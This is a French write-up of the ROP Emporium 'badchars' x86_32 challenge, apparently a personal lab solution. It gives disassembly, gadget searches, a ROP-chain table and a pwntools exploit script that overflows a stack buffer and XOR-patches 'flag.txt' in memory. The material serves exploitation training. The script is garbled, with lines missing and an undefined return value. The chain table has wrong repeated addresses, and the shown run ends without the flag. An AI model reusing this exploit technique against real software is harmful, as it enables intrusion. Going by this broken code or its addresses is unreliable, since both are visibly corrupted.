Ropemporium x86_32 bad chars
bad chars x86_32
Le challenge est décrit ainsi sur le site ropemporium
The good, the bad
Dealing with bad characters is frequently necessary in exploit development, you’ve probably had to deal with them before while encoding shellcode. “Badchars” are the reason that encoders such as shikata-ga-nai exist. When constructing your ROP chain remember that the badchars apply to every character you use, not just parameters but addresses too. To mitigate the need for too much RE the binary will list its badchars when you run it. Options
ropper has a bad characters option to help you avoid using gadgets whose address will terminate your chain prematurely, it will certainly come in handy. Note that the amount of garbage data you’ll need to send to the ARM challenge is slightly different. Moar XOR
You’ll still need to deal with writing a string into memory, similar to the write4 challenge, that may have badchars in it. Once your string is in memory and intact, just use the print_file() method to print the contents of the flag file, just like in the last challenge. Think about how we’re going to overcome the badchars issue; should we try to avoid them entirely, or could we use gadgets to change our string once it’s in memory? Helper functions
It’s almost certainly worth your time writing a helper function for this challenge. Perhaps one that takes as parameters a string, a desired location in memory and an array of badchars. It could then write the string into memory and deal with the badchars afterwards. There’s always a chance you could find a string that does what you want and doesn’t contain any badchars either.
Contenu du challenge
-rwxr-xr-x 1 root root 7252 Jul 10 2020 badchars32
-rw-r--r-- 1 root root 33 Jul 2 2020 flag.txt
-rwxr-xr-x 1 root root 7244 Jul 10 2020
ropemporium/x32/05_badchars# ./badchars32
badchars by ROP Emporium
badchars are: 'x', 'g', 'a', '.'
> okokokflag
Thank you!
gef➤ disas main
Dump of assembler code for function main:
0x08048506 <+0>: lea ecx,[esp+0x4]
0x0804850a <+4>: and esp,0xfffffff0
0x0804850d <+7>: push DWORD PTR [ecx-0x4]
0x08048510 <+10>: push ebp
0x08048511 <+11>: mov ebp,esp
0x08048513 <+13>: push ecx
0x08048514 <+14>: sub esp,0x4
0x08048517 <+17>: call 0x80483b0 <pwnme@plt>
0x0804851c <+22>: mov eax,0x0
0x08048521 <+27>: add esp,0x4
0x08048524 <+30>: pop ecx
0x08048525 <+31>: pop ebp
0x08048526 <+32>: lea esp,[ecx-0x4]
0x08048529 <+35>: ret
End of assembler dump.
La fonction pwnme est importé et située dans la librairie
Dump of assembler code for function usefulFunction:
0x0804852a <+0>: push ebp
0x0804852b <+1>: mov ebp,esp
0x0804852d <+3>: sub esp,0x8
0x08048530 <+6>: sub esp,0xc
0x08048533 <+9>: push 0x80485e0
0x08048538 <+14>: call 0x80483d0 <print_file@plt>
0x0804853d <+19>: add esp,0x10
0x08048540 <+22>: nop
0x08048541 <+23>: leave
0x08048542 <+24>: ret
End of assembler dump.
Comme dans write4 on dispose d’une fonction print file elle aussi dans le librairie
gef➤ disas usefulGadgets
Dump of assembler code for function usefulGadgets:
0x08048543 <+0>: add BYTE PTR [ebp+0x0],bl
0x08048546 <+3>: ret
0x08048547 <+4>: xor BYTE PTR [ebp+0x0],bl
0x0804854a <+7>: ret
0x0804854b <+8>: sub BYTE PTR [ebp+0x0],bl
0x0804854e <+11>: ret
0x0804854f <+12>: mov DWORD PTR [edi],esi
0x08048551 <+14>: ret
Dans la librairie
Regardons la fonction pwnme.
[0x000007cf]> pdf @sym.pwnme
┌ 274: sym.pwnme ();
│ ; var ssize_t s @ ebp-0x38
│ ; var int32_t var_34h @ ebp-0x34
│ ; var int32_t var_30h @ ebp-0x30
│ ; var int32_t var_28h @ ebp-0x28
│ ; var int32_t var_4h @ ebp-0x4
│ 0x000006bd 55 push ebp
│ 0x000006be 89e5 mov ebp, esp
│ 0x000006c0 53 push ebx
│ 0x000006c1 83ec34 sub esp, 0x34
│ 0x000006c4 e8f7feffff call entry0
│ 0x000006c9 81c337190000 add ebx, 0x1937
│ 0x000006cf 8b83f8ffffff mov eax, dword [ebx - 8]
│ 0x000006d5 8b00 mov eax, dword [eax]
│ 0x000006d7 6a00 push 0
│ 0x000006d9 6a02 push 2
│ 0x000006db 6a00 push 0 ; char *buf
│ 0x000006dd 50 push eax ; FILE*stream
│ 0x000006de e89dfeffff call sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│ 0x000006e3 83c410 add esp, 0x10
│ 0x000006e6 83ec0c sub esp, 0xc
│ 0x000006e9 8d837ce8ffff lea eax, [ebx - 0x1784]
│ 0x000006ef 50 push eax ; const char *s
│ 0x000006f0 e86bfeffff call sym.imp.puts ; int puts(const char *s)
│ 0x000006f5 83c410 add esp, 0x10
│ 0x000006f8 83ec0c sub esp, 0xc
│ 0x000006fb 8d8395e8ffff lea eax, [ebx - 0x176b]
│ 0x00000701 50 push eax ; const char *s
│ 0x00000702 e859feffff call sym.imp.puts ; int puts(const char *s)
│ 0x00000707 83c410 add esp, 0x10
│ 0x0000070a 83ec04 sub esp, 4
│ 0x0000070d 6a20 push 0x20
│ 0x0000070f 6a00 push 0 ; int c
│ 0x00000711 8d45c8 lea eax, [s]
│ 0x00000714 83c010 add eax, 0x10
│ 0x00000717 50 push eax ; void *s
│ 0x00000718 e883feffff call sym.imp.memset ; void *memset(void *s, int c, size_t n)
│ 0x0000071d 83c410 add esp, 0x10
│ 0x00000720 83ec0c sub esp, 0xc
│ 0x00000723 8d839ce8ffff lea eax, [ebx - 0x1764]
│ 0x00000729 50 push eax ; const char *s
│ 0x0000072a e831feffff call sym.imp.puts ; int puts(const char *s)
│ 0x0000072f 83c410 add esp, 0x10
│ 0x00000732 83ec0c sub esp, 0xc
│ 0x00000735 8d83bde8ffff lea eax, [ebx - 0x1743]
│ 0x0000073b 50 push eax ; const char *format
│ 0x0000073c e8effdffff call sym.imp.printf ; int printf(const char *format)
│ 0x00000741 83c410 add esp, 0x10
│ 0x00000744 83ec04 sub esp, 4
│ 0x00000747 6800020000 push 0x200
│ 0x0000074c 8d45c8 lea eax, [s]
│ 0x0000074f 83c010 add eax, 0x10
│ 0x00000752 50 push eax
│ 0x00000753 6a00 push 0 ; int fildes
│ 0x00000755 e8c6fdffff call ; ssize_t read(int fildes, void *buf, size_t nbyte)
│ 0x0000075a 83c410 add esp, 0x10
│ 0x0000075d 8945c8 mov dword [s], eax
│ 0x00000760 c745cc000000. mov dword [var_34h], 0
│ ┌─< 0x00000767 eb44 jmp 0x7ad
│ │ ; CODE XREF from sym.pwnme @ 0x7b5
│ ┌──> 0x00000769 c745d0000000. mov dword [var_30h], 0
│ ┌───< 0x00000770 eb2a jmp 0x79c
│ │╎│ ; CODE XREF from sym.pwnme @ 0x7a2
│ ┌────> 0x00000772 8b45cc mov eax, dword [var_34h]
│ ╎│╎│ 0x00000775 0fb64c05d8 movzx ecx, byte [ebp + eax - 0x28]
│ ╎│╎│ 0x0000077a 8b45d0 mov eax, dword [var_30h]
│ ╎│╎│ 0x0000077d 8b93f0ffffff mov edx, dword [ebx - 0x10]
│ ╎│╎│ 0x00000783 0fb60402 movzx eax, byte [edx + eax] ; badchars[eax]
│ ╎│╎│ 0x00000787 38c1 cmp cl, al
│ ┌─────< 0x00000789 7508 jne 0x793
│ │╎│╎│ 0x0000078b 8b45cc mov eax, dword [var_34h]
│ │╎│╎│ 0x0000078e c64405d8eb mov byte [ebp + eax - 0x28], 0xeb
│ │╎│╎│ ; CODE XREF from sym.pwnme @ 0x789
│ └─────> 0x00000793 8b45d0 mov eax, dword [var_30h]
│ ╎│╎│ 0x00000796 83c001 add eax, 1
│ ╎│╎│ 0x00000799 8945d0 mov dword [var_30h], eax
│ ╎│╎│ ; CODE XREF from sym.pwnme @ 0x770
│ ╎└───> 0x0000079c 8b45d0 mov eax, dword [var_30h]
│ ╎ ╎│ 0x0000079f 83f803 cmp eax, 3
│ └────< 0x000007a2 76ce jbe 0x772
│ ╎│ 0x000007a4 8b45cc mov eax, dword [var_34h]
│ ╎│ 0x000007a7 83c001 add eax, 1
│ ╎│ 0x000007aa 8945cc mov dword [var_34h], eax
│ ╎│ ; CODE XREF from sym.pwnme @ 0x767
│ ╎└─> 0x000007ad 8b55cc mov edx, dword [var_34h]
│ ╎ 0x000007b0 8b45c8 mov eax, dword [s]
│ ╎ 0x000007b3 39c2 cmp edx, eax
│ └──< 0x000007b5 72b2 jb 0x769
│ 0x000007b7 83ec0c sub esp, 0xc
│ 0x000007ba 8d83c0e8ffff lea eax, [ebx - 0x1740]
│ 0x000007c0 50 push eax ; const char *s
│ 0x000007c1 e89afdffff call sym.imp.puts ; int puts(const char *s)
│ 0x000007c6 83c410 add esp, 0x10
│ 0x000007c9 90 nop
│ 0x000007ca 8b5dfc mov ebx, dword [var_4h]
│ 0x000007cd c9 leave
└ 0x000007ce c3 ret
Pas façile à lire. C’est plus claire avec ghidra, surtout en renommant les variables.
char bachars[] ="xga.";
void pwnme(void)
uint msgSz;
uint ixMsg;
uint ixBadChar;
char acBuffer [36];
setvbuf(stdout,(char *)0x0,2,0);
puts("badchars by ROP Emporium");
puts("badchars are: \'x\', \'g\', \'a\', \'.\'");
printf("> ");
msgSz = read(0,acBuffer,0x200);
for (ixMsg = 0; ixMsg < msgSz; ixMsg = ixMsg + 1) {
for (ixBadChar = 0; ixBadChar < 4; ixBadChar = ixBadChar + 1) {
if (acBuffer[ixMsg] == badchars[ixBadChar]) {
acBuffer[ixMsg] = -0x15;
puts("Thank you!");
La taille du debordement est comme pour write4 0x28+4
; var ssize_t s @ ebp-0x38
0x00000747 6800020000 push 0x200
0x0000074c 8d45c8 lea eax, [s]
0x0000074f 83c010 add eax, 0x10
0x00000752 50 push eax ; => ebp-0x28
0x00000753 6a00 push 0 ; int fildes
0x00000755 e8c6fdffff call ; ssize_t read(int fildes, void *buf, size_t nbyte)
On doit donc evisager d’ecrire “flag.txt” transformé en “fl___t_t” puis de modifier les caractères interdits un par un.
Il nous faut donc
- ecrire le nom de fichier modifié Pour cela il nou faut un gadget de tyep mov [reg], reg
- alterer un caractère donné Pour cela un gadget de type add [reg], ou xor [reg]
Contruction de l’exploitation
Recherche d’un zone mémoire inscriptible
ropemporium/x32/05_badchars# rabin2 -S badchars32
nth paddr size vaddr vsize perm name
0 0x00000000 0x0 0x00000000 0x0 ----
1 0x00000154 0x13 0x08048154 0x13 -r-- .interp
2 0x00000168 0x20 0x08048168 0x20 -r-- .note.ABI-tag
3 0x00000188 0x24 0x08048188 0x24 -r--
4 0x000001ac 0x3c 0x080481ac 0x3c -r-- .gnu.hash
5 0x000001e8 0xb0 0x080481e8 0xb0 -r-- .dynsym
6 0x00000298 0x8d 0x08048298 0x8d -r-- .dynstr
7 0x00000326 0x16 0x08048326 0x16 -r-- .gnu.version
8 0x0000033c 0x20 0x0804833c 0x20 -r-- .gnu.version_r
9 0x0000035c 0x8 0x0804835c 0x8 -r-- .rel.dyn
10 0x00000364 0x18 0x08048364 0x18 -r-- .rel.plt
11 0x0000037c 0x23 0x0804837c 0x23 -r-x .init
12 0x000003a0 0x40 0x080483a0 0x40 -r-x .plt
13 0x000003e0 0x8 0x080483e0 0x8 -r-x
14 0x000003f0 0x1d2 0x080483f0 0x1d2 -r-x .text
15 0x000005c4 0x14 0x080485c4 0x14 -r-x .fini
16 0x000005d8 0x14 0x080485d8 0x14 -r-- .rodata
17 0x000005ec 0x44 0x080485ec 0x44 -r-- .eh_frame_hdr
18 0x00000630 0x114 0x08048630 0x114 -r-- .eh_frame
19 0x00000efc 0x4 0x08049efc 0x4 -rw- .init_array
20 0x00000f00 0x4 0x08049f00 0x4 -rw- .fini_array
21 0x00000f04 0xf8 0x08049f04 0xf8 -rw- .dynamic
22 0x00000ffc 0x4 0x08049ffc 0x4 -rw- .got
23 0x00001000 0x18 0x0804a000 0x18 -rw- .got.plt
24 0x00001018 0x8 0x0804a018 0x8 -rw- .data
25 0x00001020 0x0 0x0804a020 0x4 -rw- .bss
26 0x00001020 0x29 0x00000000 0x29 ---- .comment
27 0x0000104c 0x440 0x00000000 0x440 ---- .symtab
28 0x0000148c 0x213 0x00000000 0x213 ---- .strtab
29 0x0000169f 0x105 0x00000000 0x105 ---- .shstrtab
### Recherches de gadgets
05_badchars# ROPgadget --binary badchars32 --depth 4 |grep "mov.*\["
0x0804854f : mov dword ptr [edi], esi ; ret
0x08048423 : mov ebx, dword ptr [esp] ; ret
05_badchars# ROPgadget --binary badchars32 --depth 4 |grep xor
0x08048547 : xor byte ptr [ebp], bl ; ret
05_badchars# ROPgadget --binary badchars32 --depth 4 |grep "pop ebx"
0x0804839b : les ecx, ptr [eax] ; pop ebx ; ret
0x0804839d : pop ebx ; ret
05_badchars# ROPgadget --binary badchars32 --depth 4 |grep "pop ebp"
0x08048501 : mov ebp, esp ; pop ebp ; jmp 0x8048490
0x08048503 : pop ebp ; jmp 0x8048490
0x080485bb : pop ebp ; ret
0x080485ba : pop edi ; pop ebp ; ret
0x080485b9 : pop esi ; pop edi ; pop ebp ; ret
On retient :
Pour charger une mot
0x0804854f : mov dword ptr [edi], esi ; ret
Pour alterer un byte
0x08048547 : xor byte ptr [ebp], bl ; ret
Pour charger
0x0804839d : pop ebx ; ret
Pour charger
0x080485b9 : pop esi ; pop edi ; pop ebp ; ret
Pour charger :
tout seul0x080485bb : pop ebp ; ret
Construction de la chaine de rop
Préalablement on calcule la chaine “flag.txt” avec les caractères interdits xoré avec le masque 3 ce qui donne “flbd-t{t”.
ROP entry | comment |
_____________ | Ecriture de “flbd-t{t” dans data |
0x080485b9 | pop esi ; pop edi ; pop ebp ; ret |
b"flbd" | pour esi |
0x0804a018 | .data pour edi |
0 | sans objet pour ebp |
0x0804854f | mov dword ptr [edi], esi ; ret |
0x080485b9 | pop esi ; pop edi ; pop ebp ; ret |
b"-t{t" | pour esi |
0x0804a018 | .data pour edi |
0 | sans objet pour ebp |
0x0804854f | mov dword ptr [edi], esi ; ret |
_____________ | Xor data[2] avec 3 |
0x0804839d | pop ebx ; ret |
3 | pour bl |
0x080485bb | pop ebp ; ret |
0x0804a01a | .data+2 pour ebp |
0x08048547 | xor byte ptr [ebp], bl ; ret |
_____________ | Xor data[3] avec 3 |
0x080485bb | pop ebp ; ret |
0x0804a01a | .data+3 pour ebp |
0x08048547 | xor byte ptr [ebp], bl ; ret |
_____________ | Xor data[4] avec 3 |
0x080485bb | pop ebp ; ret |
0x0804a01a | .data+4 pour ebp |
0x08048547 | xor byte ptr [ebp], bl ; ret |
_____________ | Xor data[6] avec 3 |
0x080485bb | pop ebp ; ret |
0x0804a01a | .data+6 pour ebp |
0x08048547 | xor byte ptr [ebp], bl ; ret |
_____________ | Appel de print_file |
0x08048538 | usefulFunction+14 |
0x0804a018 | .data avec “flag.txt” |
Script python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
import time
import sys
# break apres le read dans pwnme
b *pwnme+273
# Gadgets
# mov dword ptr [edi], esi ; ret
# xor byte ptr [ebp], bl ; ret
g_xor_ebp = 0x08048547
# pop esi ; pop edi ; pop ebp ; ret
g_pop_esiediebp = 0x080485b9
# pop ebp ; ret
g_pop_ebp = 0x080485bb
# pop ebx ; ret
g_pop_ebx = 0x0804839d
def xorchain(chain, bytes, mask):
for i,c in enumerate(chain):
if bytes&0x80:
bytes= bytes<<1
return r
# Offset avant ecrasement de l'adresse de retour
# Set up pwntools for the correct architecture
elf = ELF('badchars32')
data = elf.get_section_by_name('.data').header['sh_addr']
flagxored = xorchain(b"flag.txt",0b00111010,3)"{data=:x}")"flag xored :" + flagxored.decode())
PL =b"A"*offset
# On ecrit "fl__" dans data
PL+=p32(0) # ebp
# On ecrit "
PL+=p32(0) # ebp
# data+2 xor 3
# data+3 xor 3
# bl ne change pas
# data+4 xor 3
# data+6 xor 3
# Appel de print_file
io = process([elf.path])
if len(sys.argv)>1 and sys.argv[1] == "-d":
#io = gdb.debug([elf.path],gdbscript=gs)
# io.recvuntil(b"> ")
05_badchars$ python3
[*] '/home/jce/w/ropemporium/x32/05_badchars/badchars32'
Arch: i386-32-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[*] data=804a018
[*] flag xored :flbd-t{t
[+] Starting local process '/home/jce/w/ropemporium/x32/05_badchars/badchars32': pid 25108
[*] Switching to interactive mode
badchars by ROP Emporium
badchars are: 'x', 'g', 'a', '.'
> Thank you!
[*] Got EOF while reading in interactive